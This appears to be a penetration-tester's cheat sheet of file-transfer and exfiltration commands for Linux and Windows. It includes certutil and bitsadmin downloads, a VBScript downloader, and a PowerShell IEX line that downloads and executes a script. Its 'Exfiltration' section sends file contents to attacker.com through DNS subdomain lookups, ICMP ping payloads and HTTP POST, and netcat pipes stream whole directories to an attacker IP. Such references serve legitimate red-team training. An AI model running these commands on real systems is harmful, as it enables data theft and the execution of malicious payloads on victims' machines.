File Transfers
Linux to Linux
HTTP Server
# Python 3
python3 -m http.server 8000
# PHP
php -S 0.0.0.0:8000
# Ruby
ruby -run -e httpd . -p 8000
# Download
wget http://attacker.com:8000/file
curl http://attacker.com:8000/file -o file
SCP
# Upload to remote
scp file.txt user@remote:/path/
# Download from remote
scp user@remote:/path/file.txt ./
# Recursive
scp -r directory user@remote:/path/
Netcat
# Receiver
nc -lvnp 4444 > received_file
# Sender
nc 10.10.10.10 4444 < file_to_send
# With progress
pv file | nc 10.10.10.10 4444
Base64
# Encode
base64 file > file.b64
# Decode
base64 -d file.b64 > file
# One-liner transfer
cat file | base64 | nc 10.10.10.10 4444
nc -lvnp 4444 | base64 -d > file
FTP
# Start FTP server
python -m pyftpdlib -p 21
# With credentials
python -m pyftpdlib -p 21 -u user -P pass
# Download
ftp 10.10.10.10
# get file.txt
SSH
# Download
scp user@remote:/path/file ./
# Upload
scp file user@remote:/path/
# Through jump host
scp -J jumphost user@target:/path/file ./
Windows to Linux
PowerShell
# Download from web
Invoke-WebRequest -Uri http://10.10.10.10/file.exe -OutFile C:\file.exe
wget http://10.10.10.10/file.exe -OutFile C:\file.exe
iwr http://10.10.10.10/file.exe -OutFile C:\file.exe
# Download and execute
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
# Upload via POST
Invoke-RestMethod -Uri http://10.10.10.10/upload -Method Post -InFile C:\file.txt
Certutil
# Download file
certutil -urlcache -f http://10.10.10.10/file.exe file.exe
certutil -urlcache -split -f http://10.10.10.10/file.exe file.exe
# Verify
certutil -hashfile file.exe MD5
BITSAdmin
# Download
bitsadmin /transfer mydownload /download /priority high http://10.10.10.10/file.exe C:\file.exe
# Alternative syntax
bitsadmin /create mydownload
bitsadmin /addfile mydownload http://10.10.10.10/file.exe C:\file.exe
bitsadmin /resume mydownload
bitsadmin /complete mydownload
SMB
# Start SMB server (Impacket)
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -username user -password pass
# On Windows
net use \\10.10.10.10\share
copy \\10.10.10.10\share\file.exe C:\file.exe
# Or directly
copy \\10.10.10.10\share\file.exe C:\file.exe
# Upload
copy C:\file.txt \\10.10.10.10\share\
FTP
# Create FTP script
echo open 10.10.10.10 > ftp.txt
echo user anonymous >> ftp.txt
echo pass >> ftp.txt
echo binary >> ftp.txt
echo get file.exe >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -s:ftp.txt
VBScript
download.vbs
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", "http://10.10.10.10/file.exe", False
objXMLHTTP.send()
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile "C:\file.exe"
objADOStream.Close
Linux to Windows
Python HTTP Server + PowerShell
# On Linux (attacker)
python3 -m http.server 80
# On Windows (target)
powershell -c "Invoke-WebRequest -Uri http://10.10.10.10/file.exe -OutFile C:\file.exe"
SMB Server
# Start SMB server (Linux)
impacket-smbserver share /path/to/files -smb2support
# Access from Windows
\\10.10.10.10\share\file.exe
net use Z: \\10.10.10.10\share
Netcat
Advanced Methods
Curl
# Upload file
curl -X POST -F "file=@file.txt" http://10.10.10.10/upload
# Download
curl http://10.10.10.10/file.txt -o file.txt
# With authentication
curl -u username:password http://10.10.10.10/file.txt -o file.txt
# Follow redirects
curl -L http://10.10.10.10/file.txt -o file.txt
# Resume download
curl -C - http://10.10.10.10/file.txt -o file.txt
Wget
# Download
wget http://10.10.10.10/file.txt
# Save with different name
wget http://10.10.10.10/file.txt -O newname.txt
# Resume
wget -c http://10.10.10.10/file.txt
# Recursive download
wget -r http://10.10.10.10/
# Mirror site
wget -m http://10.10.10.10/
# With authentication
wget --http-user=username --http-password=password http://10.10.10.10/file.txt
Rsync
# Download
rsync -avz user@remote:/path/to/file ./
# Upload
rsync -avz file user@remote:/path/
# With SSH key
rsync -avz -e "ssh -i key.pem" user@remote:/path/file ./
# Delete after transfer
rsync -avz --remove-source-files file user@remote:/path/
SCP with Port Forwarding
# Local port forward
ssh -L 2222:target:22 jumphost
scp -P 2222 user@localhost:/path/file ./
# ProxyJump
scp -J jumphost user@target:/path/file ./
Encoding/Compression
Base64
# Encode and transfer
base64 file | nc 10.10.10.10 4444
# Receive and decode
nc -lvnp 4444 | base64 -d > file
# PowerShell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\file.exe"))
[IO.File]::WriteAllBytes("C:\file.exe", [Convert]::FromBase64String("BASE64_HERE"))
Compression
# Tar and gzip
tar -czf - directory | nc 10.10.10.10 4444
# Receive
nc -lvnp 4444 | tar -xzf -
# Zip
zip -r - directory | nc 10.10.10.10 4444
# 7zip
7z a -so -t7z directory | nc 10.10.10.10 4444
Exfiltration
DNS
# Encode data in subdomain
for line in $(cat data.txt); do
dig $line.attacker.com
done
# Base32 encode
for chunk in $(cat data.txt | base32 | tr -d '=' | fold -w 63); do
dig $chunk.attacker.com
done
ICMP
# Send data in ICMP packets
file=file.txt
for byte in $(xxd -p $file | fold -w2); do
ping -c 1 -p $byte attacker.com
done
# Capture on attacker
tcpdump -i eth0 icmp -w icmp.pcap
HTTP POST
# Upload via curl
curl -X POST -F "file=@data.txt" http://attacker.com/upload.php
# Python
python -c 'import requests; requests.post("http://attacker.com/upload", files={"file": open("data.txt", "rb")})'
# PowerShell
Invoke-RestMethod -Uri http://attacker.com/upload -Method Post -InFile C:\data.txt
Cloud Storage
AWS S3
# Upload
aws s3 cp file.txt s3://bucket/file.txt
# Download
aws s3 cp s3://bucket/file.txt ./
# Sync
aws s3 sync . s3://bucket/
Google Drive (gdrive)
Dropbox (dbxcli)
WebDAV
# Start WebDAV server
wsgidav --host=0.0.0.0 --port=80 --root=/path/to/share
# On Windows
net use * http://10.10.10.10/
copy file.exe Z:\
# On Linux
cadaver http://10.10.10.10/
# put file.txt
Socat
# File transfer
# Receiver
socat TCP-LISTEN:4444,reuseaddr FILE:received_file,create
# Sender
socat FILE:file_to_send TCP:10.10.10.10:4444